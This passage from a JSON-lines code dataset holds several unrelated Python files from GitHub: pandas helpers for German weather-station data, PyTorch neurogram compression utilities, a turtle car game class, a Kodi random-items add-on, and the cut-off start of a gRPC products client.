'backlog/'\n \n last_days = dataframe['bis_datum'].max() - dt.timedelta(days)\n\n filelist = [f for f in os.listdir(pfad) if os.path.isdir(os.path.join(pfad, f))]\n \n j = 0\n for i in filelist:\n if i < str(last_days):\n shutil.rmtree(pfad + '/' + i)\n print('Das Verzeichnis ', i, ' wurde gelöscht.')\n j = j + 1\n \n if j == 0:\n print('Es wurde kein Verzeichnis gelöscht.')\n \n return\n\n\ndef best_formula(dataframe, response):\n remaining = set(dataframe.columns)\n remaining.remove(response)\n selected, results = [], []\n while remaining:\n scores_with_candidates = []\n for candidate in remaining:\n formula = '{} ~ {}'.format(response, ' + '.join(selected + [candidate]))\n lm = smf.gls(formula, sm.add_constant(dataframe)).fit()\n score = lm.rsquared_adj\n scores_with_candidates.append((score, candidate, [formula, lm.rsquared_adj, lm.ssr]))\n scores_with_candidates.sort()\n best_score, best_candidate, best_metrics = scores_with_candidates.pop()\n results.append(best_metrics)\n remaining.remove(best_candidate)\n selected.append(best_candidate)\n dataframe = pd.DataFrame(results)\n dataframe.columns = ['formula', 'adjr2', 'ssr']\n dataframe = dataframe.sort_values('adjr2', axis=0, ascending=False)[:1].reset_index()\n formula = str(dataframe['formula'].values).replace('[', '').replace(']', '').replace(\"'\", '')\n \n return formula, dataframe\n\n\ndef df_infos(dateframe): \n result=pd.DataFrame()\n result[\"Columns\"]=[x for x in dateframe.columns]\n result[\"type\"]=[x for x in dateframe.dtypes]\n result[\"Unique values count\"]=[dateframe.groupby(x)[x].count().shape[0] for x in dateframe.columns]\n result[\"Zeros\"]=[sum(dateframe[x] == 0) for x in dateframe.columns]\n result[\"NaNs\"]=[sum(dateframe[x] == np.NaN) for x in dateframe.columns]\n result['Sample']=[dateframe[x][10] for x in dateframe.columns]\n \n return result\n\n\ndef rnd_stations(dataframe, anzahl):\n dataframe_temp1 = pd.DataFrame()\n dataframe_temp2 = pd.DataFrame()\n \n list1 = dataframe['STATIONS_ID'].unique()\n random_items = random.choices(population=list1, k=anzahl)\n \n for i in random_items:\n dataframe_temp2 = dataframe.loc[dataframe['STATIONS_ID'] == i]\n dataframe_temp1 = dataframe_temp1.append(dataframe_temp2)\n \n return dataframe_temp1\n\n\ndef zeitraeume_ergaenzen(dataframe):\n df_rest = dataframe.copy()\n\n list1 = list(set(dataframe['STATIONS_ID']))\n list2 = []\n df_temp = pd.DataFrame()\n df_asdf = pd.DataFrame()\n madate = max(df_rest['MESS_DATUM'])\n midate = min(df_rest['MESS_DATUM'])\n dedate = int(str(madate - midate).replace(' days 00:00:00', '')) + 1\n maxdate = df_rest.copy()\n maxdate.index = pd.DatetimeIndex(df_rest['MESS_DATUM']).floor('D')\n\n dates = pd.date_range(midate, madate)\n\n for s in list1:\n df_temp = dataframe.loc[dataframe['STATIONS_ID'] == s]\n if df_temp.shape[0] < dedate:\n list2 += [s]\n\n df_temp = pd.DataFrame()\n for t in list2:\n #print('start', df_rest.shape)\n df_drop = dataframe.loc[dataframe['STATIONS_ID'] == t]\n df_rest = df_rest.drop(df_drop.index, axis=0)\n #print('after drop', df_rest.shape)\n df_temp = dataframe.loc[dataframe['STATIONS_ID'] == t]\n a = df_temp.shape\n #print('len station original', t, a)\n df_temp.index = pd.DatetimeIndex(df_temp['MESS_DATUM']).floor('D')\n #print(df_asdf.index)\n all_days = pd.date_range(df_temp.index.min(), maxdate.index.max(), freq='D')\n #print(all_days)\n df_temp = df_temp.loc[all_days]\n df_temp['STATIONS_ID'] = t\n df_temp['MESS_DATUM'] = df_temp.index\n df_temp = df_temp.reset_index().drop('index', axis=1)\n b = df_temp.shape\n #print('len station new', t, b)\n #print('delta', t, b[0] - a[0])\n df_asdf = df_asdf.append(df_temp)\n #print('sum end', df_asdf.shape)\n #print('----------')\n\n df = df_rest.append(df_asdf)\n\n madate = max(df['MESS_DATUM'])\n midate = min(df['MESS_DATUM'])\n dedate = int(str(madate - midate).replace(' days 00:00:00', '')) + 1\n anzahl_stat = len(df['STATIONS_ID'].unique())\n anzahl_dsatz = len(df)\n anzahl_dsoll = anzahl_stat * dedate\n anzahl_dfehl = anzahl_dsoll - anzahl_dsatz\n\n if anzahl_dfehl == 0:\n print('Alle fehlenden Werte (Zeitäume) wurden ergänzt')\n else:\n print('Nicht alle fehlenden Werte (Zeitäume) wurden ergänzt')\n \n return df\n\n\ndef fehlwerte_ermitteln(dataframe):\n df_temp = dataframe.copy()\n \n df_temp = df_temp.replace(-9999, np.NaN).replace(-999, np.NaN).replace(-99, np.NaN)\n count = df_temp.isnull().values.sum()\n\n print('Gesamtzahl aller Fehlwerte: ', count)\n\n return df_temp\n\n\ndef einzelne_fehlwerte_ersetzen(dataframe):\n df_temp = dataframe.copy()\n list1 = list(set(dataframe['STATIONS_ID']))\n list2 = list(set(dataframe['MESS_DATUM']))\n dft1 = pd.DataFrame()\n dft2 = pd.DataFrame()\n dft3 = pd.DataFrame()\n \n df_temp = df_temp.replace(-9999, np.NaN).replace(-999, np.NaN).replace(-99, np.NaN)\n df_temp = df_temp.sort_values(by=['STATIONS_ID', 'MESS_DATUM'])\n \n for s in list1:\n dft1 = df_temp.loc[df_temp['STATIONS_ID'] == s]\n dft1 = dft1.fillna(method='pad')\n dft1 = dft1.fillna(method='backfill')\n dft2 = dft2.append(dft1)\n \n dft2 = dft2.sort_values(by=['MESS_DATUM', 'STATIONS_ID'])\n dft1 = pd.DataFrame()\n \n for t in list2:\n dft1 = dft2.loc[dft2['MESS_DATUM'] == t]\n dft1 = dft1.fillna(method='pad')\n dft1 = dft1.fillna(method='backfill')\n dft3 = dft3.append(dft1)\n \n dft3 = dft3.sort_values(by=['STATIONS_ID', 'MESS_DATUM'])\n \n dft3.drop_duplicates(inplace=True)\n dft3['STATIONS_ID'] = dft3['STATIONS_ID'].astype('int64')\n dft3['NM'] = dft3['NM'].astype('category')\n \n print('Einzele Fehlwerte wurden ersetzt')\n \n return dft3\n\n\ndef rest_fehlwerte_ersetzen(dataframe):\n df_temp = dataframe.copy()\n \n df_temp = df_temp.replace(np.NaN, 0)\n \n return df_temp\n\ndef Plausi_Voll(dataframe):\n # Funktionen\n madate = max(dataframe['MESS_DATUM'])\n midate = min(dataframe['MESS_DATUM'])\n dedate = int(str(madate - midate).replace(' days 00:00:00', '')) + 1\n anzahl_stat = len(dataframe['STATIONS_ID'].unique())\n anzahl_dsatz = len(dataframe)\n anzahl_dsoll = anzahl_stat * dedate\n anzahl_dfehl = anzahl_dsoll - anzahl_dsatz\n \n # Ausdruck\n print('Mindestdatum: ', midate)\n print('Höchstdatum: ', madate)\n print('Anzahl Tage: ', dedate)\n print('Anzahl Stationen IST: ', anzahl_stat)\n print('Anzahl Datensätze IST: ', anzahl_dsatz)\n print('Anzahl Datensätze SOLL: ', anzahl_dsoll)\n print('Anzahl fehlender Datensätze: ', anzahl_dfehl)\n\n return\n\n","repo_name":"carmir71/dwd","sub_path":"funktionen_0.py","file_name":"funktionen_0.py","file_ext":"py","file_size_in_byte":23822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34034698450","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Feb 20 18:14:12 2022\n\n@author: anagathil\n\"\"\"\nimport torch\n\ndef comp(x,c,mode):\n if mode == 'symlog':\n y = torch.sign(x)*torch.log(1+c*torch.abs(x))\n elif mode == 'sqrt':\n y = torch.sign(x)*torch.pow(torch.abs(x),c)\n return y\n\ndef invcomp(y,c,mode):\n if mode == 'symlog':\n x = torch.sign(y)*(torch.exp(torch.abs(y))-1)/c\n elif mode == 'sqrt':\n x = torch.sign(y)*torch.pow(torch.abs(y),1/c);\n return x\n \n\ndef rescaleIhcograms(scaleType,scaleWeight,neurogram_pred,neurogram,normFactor):\n if scaleType == 'symlog' or scaleType == 'sqrt':\n neurogram_pred = invcomp(neurogram_pred*normFactor, scaleWeight, scaleType) \n neurogram = invcomp(neurogram*normFactor, scaleWeight, scaleType)\n else:\n neurogram_pred = neurogram_pred*normFactor\n neurogram = neurogram*normFactor\n return neurogram_pred, neurogram\n\n","repo_name":"ika-ruhr-uni-bochum/IHCApproxNH","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"30432831488","text":"from turtle import Turtle\nimport random\n\nCOLORS = [\"yellow\", \"blue\", \"red\", \"green\", \"purple\"]\nMOVE_PACE = 5\nMOVE_INCREMENT = 10\n\n\nclass CarManager:\n def __init__(self):\n self.all_cars = []\n self.move_speed = MOVE_PACE\n\n def create_car(self):\n random_num = random.randint(1, 6)\n if random_num == 1:\n new_car = Turtle(\"square\")\n new_car.color(random.choice(COLORS))\n new_car.shapesize(stretch_wid=1, stretch_len=2)\n random_y = random.randint(-250, 250)\n new_car.penup()\n new_car.goto(300, random_y)\n self.all_cars.append(new_car)\n\n def move_cars(self):\n for car in self.all_cars:\n car.backward(self.move_speed)\n\n def level_up(self):\n self.move_speed += MOVE_INCREMENT\n\n","repo_name":"SunshineFaxixi/Python_Learning","sub_path":"100days_of_python/day23/car_management.py","file_name":"car_management.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"39623507095","text":"# * Thanks to:\n# *\n# * Nuka for the original RecentlyAdded.py on which this is based\n# *\n# * ppic, Hitcher,ronie & phil65, Martijn for the updates\n\nimport xbmc\nimport xbmcgui\nimport xbmcaddon\nimport sys\nimport os\nimport random\n\nif sys.version_info < (2, 7):\n import simplejson\nelse:\n import json as simplejson\n\n__addon__ = xbmcaddon.Addon()\n__addonid__ = __addon__.getAddonInfo('id')\n__addonversion__ = __addon__.getAddonInfo('version')\n\ndef log(txt):\n message = '%s: %s' % (__addonid__, txt)\n xbmc.log(msg=message, level=xbmc.LOGDEBUG)\n\nclass Main:\n def __init__( self ):\n # parse argv for any preferences\n self._parse_argv()\n self._init_vars()\n # check if we were executed internally\n if self.ALBUMID:\n xbmc.executeJSONRPC('{ \"jsonrpc\": \"2.0\", \"method\": \"Player.Open\", \"params\": { \"item\": { \"albumid\": %d } }, \"id\": 1 }' % int(self.ALBUMID))\n else:\n # clear our property, if another instance is already running it should stop now\n self.WINDOW.clearProperty('RandomItems_Running_Running')\n # clear properties\n self._clear_properties()\n # set any alarm\n self._set_alarm()\n # fetch media info\n self._fetch_movie_info()\n self._fetch_episode_info()\n self._fetch_musicvideo_info()\n self._fetch_album_info()\n self._fetch_artist_info()\n self._fetch_song_info()\n self._fetch_addon_info()\n xbmc.sleep(1000)\n self.WINDOW.setProperty('RandomItems_Running', 'True')\n self._daemon()\n \n def _parse_argv( self ):\n try:\n # parse sys.argv for params\n params = dict( arg.split( \"=\" ) for arg in sys.argv[ 1 ].split( \"&\" ) )\n except:\n # no params passed\n params = {}\n # set our preferences\n self.LIMIT = int( params.get( \"limit\", \"5\" ) )\n self.UNPLAYED = params.get( \"unplayed\", \"False\" )\n self.PLAY_TRAILER = params.get( \"trailer\", \"False\" )\n self.ALARM = int( params.get( \"alarm\", \"0\" ) )\n self.ALBUMID = params.get( \"albumid\", \"\" )\n\n def _init_vars( self ):\n self.WINDOW = xbmcgui.Window( 10000 )\n self.Player = MyPlayer( action = self._update)\n self.Monitor = MyMonitor(action = self._update)\n\n def _clear_properties( self ):\n # reset totals property for visible condition\n self.WINDOW.clearProperty( \"RandomAddon.Count\" )\n # we clear title for visible condition\n for count in range( self.LIMIT ):\n self.WINDOW.clearProperty( \"RandomMovie.%d.Title\" % ( count + 1 ) )\n self.WINDOW.clearProperty( \"RandomEpisode.%d.Title\" % ( count + 1 ) )\n self.WINDOW.clearProperty( \"RandomMusicVideo.%d.Title\" % ( count + 1 ) )\n self.WINDOW.clearProperty( \"RandomSong.%d.Title\" % ( count + 1 ) )\n self.WINDOW.clearProperty( \"RandomAlbum.%d.Title\" % ( count + 1 ) )\n self.WINDOW.clearProperty( \"RandomAddon.%d.Name\" % ( count + 1 ) )\n\n def _set_alarm( self ):\n # only run if user/skinner preference\n if ( not self.ALARM ): return\n # set the alarms command\n command = \"XBMC.RunScript(%s,limit=%d&unplayed=%s&trailer=%s&alarm=%d)\" % ( __addonid__, self.LIMIT, str( self.UNPLAYED ), str( self.PLAY_TRAILER ), self.ALARM, )\n xbmc.executebuiltin( \"AlarmClock(RandomItems,%s,%d,true)\" % ( command, self.ALARM, ) )\n\n def _fetch_movie_info( self ):\n if self.UNPLAYED == \"True\":\n json_query = xbmc.executeJSONRPC('{\"jsonrpc\": \"2.0\", \"method\": \"VideoLibrary.GetMovies\", \"params\": {\"properties\": [\"title\", \"playcount\", \"year\", \"plot\", \"runtime\", \"fanart\", \"thumbnail\", \"file\", \"trailer\", \"rating\"], \"filter\": {\"field\": \"playcount\", \"operator\": \"lessthan\", \"value\": \"1\"}, \"sort\": {\"method\": \"random\" }, \"limits\": {\"end\": %d} }, \"id\": 1}' %self.LIMIT)\n else:\n json_query = xbmc.executeJSONRPC('{\"jsonrpc\": \"2.0\", \"method\": \"VideoLibrary.GetMovies\", \"params\": {\"properties\": [\"title\", \"playcount\", \"year\", \"plot\", \"runtime\", \"fanart\", \"thumbnail\", \"file\", \"trailer\", \"rating\"], \"sort\": {\"method\": \"random\" }, \"limits\": {\"end\": %d} }, \"id\": 1}' %self.LIMIT)\n json_query = unicode(json_query, 'utf-8', errors='ignore')\n # separate the records\n json_response = simplejson.loads(json_query)\n if json_response.has_key('result') and json_response['result'] != None and json_response['result'].has_key('movies'):\n count = 0\n for item in json_response['result']['movies']:\n count += 1\n # set our properties\n self.WINDOW.setProperty( \"RandomMovie.%d.Title\" % ( count ), item['title'] )\n self.WINDOW.setProperty( \"RandomMovie.%d.Rating\" % ( count ), str(round(float(item['rating']),1)) )\n self.WINDOW.setProperty( \"RandomMovie.%d.Year\" % ( count ), str(item['year']))\n self.WINDOW.setProperty( \"RandomMovie.%d.Plot\" % ( count ), item['plot'] )\n self.WINDOW.setProperty( \"RandomMovie.%d.RunningTime\" % ( count ), item['runtime'] )\n self.WINDOW.setProperty( \"RandomMovie.%d.Path\" % ( count ), item['file'] )\n self.WINDOW.setProperty( \"RandomMovie.%d.Trailer\" % ( count ), item['trailer'] )\n self.WINDOW.setProperty( \"RandomMovie.%d.Fanart\" % ( count ), item['fanart'] )\n self.WINDOW.setProperty( \"RandomMovie.%d.Thumb\" % ( count ), item['thumbnail'] )\n\n def _fetch_episode_info( self ):\n if self.UNPLAYED == \"True\":\n json_query = xbmc.executeJSONRPC('{\"jsonrpc\": \"2.0\", \"method\": \"VideoLibrary.GetEpisodes\", \"params\": { \"properties\": [\"title\", \"playcount\", \"season\", \"episode\", \"showtitle\", \"plot\", \"fanart\", \"thumbnail\", \"file\", \"rating\"], \"filter\": {\"field\": \"playcount\", \"operator\": \"lessthan\", \"value\": \"1\"}, \"sort\": {\"method\": \"random\" }, \"limits\": {\"end\": %d} }, \"id\": 1}' %self.LIMIT)\n else:\n json_query = xbmc.executeJSONRPC('{\"jsonrpc\": \"2.0\", \"method\": \"VideoLibrary.GetEpisodes\", \"params\": { \"properties\": [\"title\", \"playcount\", \"season\", \"episode\", \"showtitle\", \"plot\", \"fanart\", \"thumbnail\", \"file\", \"rating\"], \"sort\": {\"method\": \"random\" }, \"limits\": {\"end\": %d} }, \"id\": 1}' %self.LIMIT)\n json_response = unicode(json_query, 'utf-8', errors='ignore')\n jsonobject = simplejson.loads(json_response)\n if jsonobject.has_key('result') and jsonobject['result'] != None and jsonobject['result'].has_key('episodes'):\n count = 0\n for item in jsonobject['result']['episodes']:\n count += 1\n season = \"%.2d\" % float(item['season'])\n episode = \"%.2d\" % float(item['episode'])\n episodeno = \"s%se%s\" % ( season, episode, )\n # set our properties\n self.WINDOW.setProperty( \"RandomEpisode.%d.ShowTitle\" % ( count ), item['showtitle'] )\n self.WINDOW.setProperty( \"RandomEpisode.%d.EpisodeTitle\" % ( count ), item['title'] )\n self.WINDOW.setProperty( \"RandomEpisode.%d.EpisodeNo\" % ( count ), episodeno )\n self.WINDOW.setProperty( \"RandomEpisode.%d.EpisodeSeason\" % ( count ), season )\n self.WINDOW.setProperty( \"RandomEpisode.%d.EpisodeNumber\" % ( count ), episode )\n self.WINDOW.setProperty( \"RandomEpisode.%d.Rating\" % ( count ), str(round(float(item['rating']),1)) )\n self.WINDOW.setProperty( \"RandomEpisode.%d.Plot\" % ( count ), item['plot'] )\n self.WINDOW.setProperty( \"RandomEpisode.%d.Path\" % ( count ), item['file'] )\n self.WINDOW.setProperty( \"RandomEpisode.%d.Fanart\" % ( count ), item['fanart'] )\n self.WINDOW.setProperty( \"RandomEpisode.%d.Thumb\" % ( count ), item['thumbnail'] )\n\n def _fetch_musicvideo_info( self ):\n if self.UNPLAYED == \"True\":\n json_query = xbmc.executeJSONRPC('{\"jsonrpc\": \"2.0\", \"method\": \"VideoLibrary.GetMusicVideos\", \"params\": {\"properties\": [\"title\", \"artist\", \"playcount\", \"year\", \"plot\", \"runtime\", \"fanart\", \"thumbnail\", \"file\"], \"filter\": {\"field\": \"playcount\", \"operator\": \"lessthan\", \"value\": \"1\"}, \"sort\": {\"method\": \"random\"}, \"limits\": {\"end\": %d}}, \"id\": 1}' %self.LIMIT)\n else:\n json_query = xbmc.executeJSONRPC('{\"jsonrpc\": \"2.0\", \"method\": \"VideoLibrary.GetMusicVideos\", \"params\": {\"properties\": [\"title\", \"artist\", \"playcount\", \"year\", \"plot\", \"runtime\", \"fanart\", \"thumbnail\", \"file\"], \"sort\": {\"method\": \"random\"}, \"limits\": {\"end\": %d}}, \"id\": 1}' %self.LIMIT)\n json_query = unicode(json_query, 'utf-8', errors='ignore')\n # separate the records\n json_response = simplejson.loads(json_query)\n if json_response.has_key('result') and json_response['result'] != None and json_response['result'].has_key('musicvideos'):\n count = 0\n for item in json_response['result']['musicvideos']:\n count += 1\n # set our properties\n self.WINDOW.setProperty( \"RandomMusicVideo.%d.Title\" % ( count ), item['title'] )\n self.WINDOW.setProperty( \"RandomMusicVideo.%d.Year\" % ( count ), str(item['year']))\n self.WINDOW.setProperty( \"RandomMusicVideo.%d.Plot\" % ( count ), item['plot'] )\n self.WINDOW.setProperty( \"RandomMusicVideo.%d.RunningTime\" % ( count ), item['runtime'] )\n self.WINDOW.setProperty( \"RandomMusicVideo.%d.Path\" % ( count ), item['file'] )\n self.WINDOW.setProperty( \"RandomMusicVideo.%d.Fanart\" % ( count ), item['fanart'] )\n self.WINDOW.setProperty( \"RandomMusicVideo.%d.Artist\" % ( count ), \" / \".join( item['artist'] ) )\n self.WINDOW.setProperty( \"RandomMusicVideo.%d.Thumb\" % ( count ), item['thumbnail'] )\n\n def _fetch_album_info( self ):\n if self.UNPLAYED == \"True\":\n json_query = xbmc.executeJSONRPC('{\"jsonrpc\": \"2.0\", \"method\": \"AudioLibrary.GetAlbums\", \"params\": {\"properties\": [\"title\", \"description\", \"albumlabel\", \"artist\", \"genre\", \"year\", \"thumbnail\", \"fanart\", \"rating\", \"playcount\"], \"filter\": {\"field\": \"playcount\", \"operator\": \"lessthan\", \"value\": \"1\"}, \"sort\": {\"method\": \"random\"}, \"limits\": {\"end\": %d}}, \"id\": 1}' %self.LIMIT)\n else:\n json_query = xbmc.executeJSONRPC('{\"jsonrpc\": \"2.0\", \"method\": \"AudioLibrary.GetAlbums\", \"params\": {\"properties\": [\"title\", \"description\", \"albumlabel\", \"artist\", \"genre\", \"year\", \"thumbnail\", \"fanart\", \"rating\", \"playcount\"], \"sort\": {\"method\": \"random\"}, \"limits\": {\"end\": %d}}, \"id\": 1}' %self.LIMIT)\n json_response = unicode(json_query, 'utf-8', errors='ignore')\n jsonobject = simplejson.loads(json_response)\n if jsonobject.has_key('result') and jsonobject['result'] != None and jsonobject['result'].has_key('albums'):\n count = 0\n for item in jsonobject['result']['albums']:\n count += 1\n rating = str(item['rating'])\n if rating == '48':\n rating = ''\n path = 'XBMC.RunScript(' + __addonid__ + ',albumid=' + str(item['albumid']) + ')'\n self.WINDOW.setProperty( \"RandomAlbum.%d.Title\" % ( count ), item['title'] )\n self.WINDOW.setProperty( \"RandomAlbum.%d.Rating\" % ( count ), rating )\n self.WINDOW.setProperty( \"RandomAlbum.%d.Year\" % ( count ), str(item['year']) )\n self.WINDOW.setProperty( \"RandomAlbum.%d.Artist\" % ( count ), \" / \".join(item['artist']) )\n self.WINDOW.setProperty( \"RandomAlbum.%d.Path\" % ( count ), path )\n self.WINDOW.setProperty( \"RandomAlbum.%d.Fanart\" % ( count ), item['fanart'] )\n self.WINDOW.setProperty( \"RandomAlbum.%d.Thumb\" % ( count ), item['thumbnail'] )\n self.WINDOW.setProperty( \"RandomAlbum.%d.Album_Description\" % ( count ), item['description'] )\n\n def _fetch_artist_info( self ):\n json_query = xbmc.executeJSONRPC('{\"jsonrpc\": \"2.0\", \"method\": \"AudioLibrary.GetArtists\", \"params\": {\"properties\": [\"genre\", \"description\", \"fanart\", \"thumbnail\"], \"sort\": {\"method\": \"random\"}, \"limits\": {\"end\": %d}}, \"id\": 1}' %self.LIMIT)\n json_response = unicode(json_query, 'utf-8', errors='ignore')\n jsonobject = simplejson.loads(json_response)\n if jsonobject.has_key('result') and jsonobject['result'] != None and jsonobject['result'].has_key('artists'):\n count = 0\n for item in jsonobject['result']['artists']:\n count += 1\n path = 'musicdb://2/' + str(item['artistid']) + '/'\n self.WINDOW.setProperty( \"RandomArtist.%d.Title\" % ( count ), item['label'] )\n self.WINDOW.setProperty( \"RandomArtist.%d.Genre\" % ( count ), \" / \".join( item['genre'] ) )\n self.WINDOW.setProperty( \"RandomArtist.%d.Path\" % ( count ), path )\n self.WINDOW.setProperty( \"RandomArtist.%d.Fanart\" % ( count ), item['fanart'] )\n self.WINDOW.setProperty( \"RandomArtist.%d.Thumb\" % ( count ), item['thumbnail'] )\n self.WINDOW.setProperty( \"RandomArtist.%d.Artist_Description\" % ( count ), item['description'] )\n\n def _fetch_song_info( self ):\n if self.UNPLAYED == \"True\":\n json_query = xbmc.executeJSONRPC('{\"jsonrpc\": \"2.0\", \"method\": \"AudioLibrary.GetSongs\", \"params\": {\"properties\": [\"title\", \"playcount\", \"artist\", \"album\", \"year\", \"file\", \"thumbnail\", \"fanart\", \"rating\"], \"filter\": {\"field\": \"playcount\", \"operator\": \"lessthan\", \"value\": \"1\"}, \"sort\": {\"method\": \"random\"}, \"limits\": {\"end\": %d}}, \"id\": 1}' %self.LIMIT)\n else:\n json_query = xbmc.executeJSONRPC('{\"jsonrpc\": \"2.0\", \"method\": \"AudioLibrary.GetSongs\", \"params\": {\"properties\": [\"title\", \"playcount\", \"artist\", \"album\", \"year\", \"file\", \"thumbnail\", \"fanart\", \"rating\"], \"sort\": {\"method\": \"random\"}, \"limits\": {\"end\": %d}}, \"id\": 1}' %self.LIMIT)\n json_response = unicode(json_query, 'utf-8', errors='ignore')\n jsonobject = simplejson.loads(json_response)\n if jsonobject.has_key('result') and jsonobject['result'] != None and jsonobject['result'].has_key('songs'):\n count = 0\n for item in jsonobject['result']['songs']:\n count += 1\n self.WINDOW.setProperty( \"RandomSong.%d.Title\" % ( count ), item['title'] )\n self.WINDOW.setProperty( \"RandomSong.%d.Rating\" % ( count ), str(int(item['rating'])-48) )\n self.WINDOW.setProperty( \"RandomSong.%d.Year\" % ( count ), str(item['year']) )\n self.WINDOW.setProperty( \"RandomSong.%d.Artist\" % ( count ), \" / \".join( item['artist'] ) )\n self.WINDOW.setProperty( \"RandomSong.%d.Album\" % ( count ), item['album'] )\n self.WINDOW.setProperty( \"RandomSong.%d.Path\" % ( count ), item['file'] )\n self.WINDOW.setProperty( \"RandomSong.%d.Fanart\" % ( count ), item['fanart'] )\n self.WINDOW.setProperty( \"RandomSong.%d.Thumb\" % ( count ), item['thumbnail'] )\n\n def _fetch_addon_info( self ):\n json_query = xbmc.executeJSONRPC('{\"jsonrpc\": \"2.0\", \"method\": \"Addons.GetAddons\", \"params\": {\"properties\": [\"name\", \"author\", \"summary\", \"version\", \"fanart\", \"thumbnail\"]}, \"id\": 1}')\n json_response = unicode(json_query, 'utf-8', errors='ignore')\n jsonobject = simplejson.loads(json_response)\n if jsonobject.has_key('result') and jsonobject['result'] != None and jsonobject['result'].has_key('addons'):\n total = str( len( jsonobject['result']['addons'] ) )\n # find plugins and scripts\n addonlist = []\n for item in jsonobject['result']['addons']:\n if item['type'] == 'xbmc.python.script' or item['type'] == 'xbmc.python.pluginsource':\n addonlist.append(item)\n # randomize the list\n random.shuffle(addonlist)\n count = 0\n for item in addonlist:\n count += 1\n self.WINDOW.setProperty( \"RandomAddon.%d.Name\" % ( count ), item['name'] )\n self.WINDOW.setProperty( \"RandomAddon.%d.Author\" % ( count ), item['author'] )\n self.WINDOW.setProperty( \"RandomAddon.%d.Summary\" % ( count ), item['summary'] )\n self.WINDOW.setProperty( \"RandomAddon.%d.Version\" % ( count ), item['version'] )\n self.WINDOW.setProperty( \"RandomAddon.%d.Path\" % ( count ), item['addonid'] )\n self.WINDOW.setProperty( \"RandomAddon.%d.Fanart\" % ( count ), item['fanart'] )\n self.WINDOW.setProperty( \"RandomAddon.%d.Thumb\" % ( count ), item['thumbnail'] )\n self.WINDOW.setProperty( \"RandomAddon.%d.Type\" % ( count ), item['type'] )\n self.WINDOW.setProperty( \"RandomAddon.Count\" , total )\n # stop if we've reached the number of items we need\n if count == self.LIMIT:\n break\n\n def _daemon( self ):\n # keep running until xbmc exits or another instance is started\n while (not xbmc.abortRequested) and self.WINDOW.getProperty('RandomItems_Running') == 'True':\n xbmc.sleep(500)\n if xbmc.abortRequested:\n log('script stopped: xbmc quit')\n else:\n log('script stopped: new script instance started')\n\n def _update( self, type):\n xbmc.sleep(500)\n if type == 'movie':\n self._fetch_movies()\n elif type == 'episode':\n self._fetch_episode_info()\n elif type == 'video':\n self._fetch_movie_info()\n self._fetch_episode_info()\n self._fetch_musicvideo_info()\n elif type == 'album' or type == 'music':\n self._fetch_album_info()\n self._fetch_artist_info()\n self._fetch_song_info()\n\nclass MyMonitor(xbmc.Monitor):\n def __init__( self, *args, **kwargs ):\n xbmc.Monitor.__init__( self )\n self.action = kwargs['action']\n\n def onDatabaseUpdated( self, database):\n self.action(database)\n\nclass MyPlayer(xbmc.Player):\n def __init__( self, *args, **kwargs ):\n xbmc.Player.__init__( self )\n self.action = kwargs[ \"action\" ]\n self.substrings = [ '-trailer', 'http://' ]\n\n def onPlayBackStarted( self ):\n xbmc.sleep(1000)\n self.type = \"\"\n # Set values based on the file content\n if ( self.isPlayingAudio() ):\n self.type = \"album\" \n else:\n if xbmc.getCondVisibility( 'VideoPlayer.Content(movies)' ):\n filename = ''\n isMovie = True\n try:\n filename = self.getPlayingFile()\n except:\n pass\n if filename != '':\n for string in self.substrings:\n if string in filename:\n isMovie = False\n break\n if isMovie:\n self.type = \"movie\"\n elif xbmc.getCondVisibility( 'VideoPlayer.Content(episodes)' ):\n # Check for tv show title and season to make sure it's really an episode\n if xbmc.getInfoLabel('VideoPlayer.Season') != \"\" and xbmc.getInfoLabel('VideoPlayer.TVShowTitle') != \"\":\n self.type = \"episode\"\n\n def onPlayBackEnded( self ):\n if self.type == 'movie':\n self.action( 'movie')\n elif self.type == 'episode':\n self.action( 'episode')\n elif self.type == 'album':\n self.action('album')\n self.type = \"\"\n \n\n def onPlayBackStopped( self ):\n if self.type == 'movie':\n self.action( 'movie')\n elif self.type == 'episode':\n self.action( 'episode')\n elif self.type == 'album':\n self.action( 'album')\n self.type = \"\"\n \nif ( __name__ == \"__main__\" ):\n log('script version %s started' % __addonversion__)\n Main()\nlog('script stopped')\n","repo_name":"XBMC-Addons/script.randomitems","sub_path":"RandomItems.py","file_name":"RandomItems.py","file_ext":"py","file_size_in_byte":20417,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"17224210572","text":"from dataclasses import dataclass\n\nimport grpc\nfrom google.protobuf.json_format import MessageToDict\n\nimport products_pb2 as pb2\nimport products_pb2_grpc as pb2_grpc\nfrom configs import get_configs\nfrom constants import convert_category\nfrom schemas import Brand, Category, ProductResponseSchema, ServiceCenterSchema\n\n\n@dataclass\nclass GRPCProductsClient:\n host: str = get_configs().grpc_host\n port: int = 50051\n\n async def get_brands(self):\n async with grpc.aio.insecure_channel(f'{self.host}:{self.port}', compression=grpc.Compression.Gzip) as channel:\n stub = pb2_grpc.ProductsServiceStub(channel=channel)\n message = pb2.BrandRequest(value='brand')\n results = await stub.GetBrands(message)\n return [Brand(id=x.id, value=x.name.title()) for x in results.results]\n\n async def get_categories(self, brand: str):\n async with grpc.aio.insecure_channel(f'{self.host}:{self.port}', compression=grpc.Compression.Gzip) as channel:\n stub = pb2_grpc.ProductsServiceStub(channel=channel)\n message = pb2.CategoryRequest(brand=brand)\n results = await stub.GetCategories(message)\n return [Category(id=x.id, name=x.name, brand=x.brand) for x in results.results]\n\n async def get_products(self, brand: str, category: str, page: int | None = None):\n async with grpc.aio.insecure_channel(f'{self.host}:{self.port}', compression=grpc.Compression.Gzip) as channel:\n stub = pb2_grpc.ProductsServiceStub(channel=channel)\n category = convert_category(category=category)\n if category:\n message_products = pb2.ProductsRequest(brand=brand.lower(), category=category, page=page)\n message_count = pb2.ProductsCountRequest(brand=brand.lower(), category=category)\n result = await stub.GetProducts(message_products)\n count = await stub.GetCount(message_count)\n return ProductResponseSchema(count_documents=count.products_count, products=result.products)\n\n async def get_specifications(self, product_id: int):\n async with grpc.aio.insecure_channel(f'{self.host}:{self.port}', compression=grpc.Compression.Gzip) as channel:\n stub = 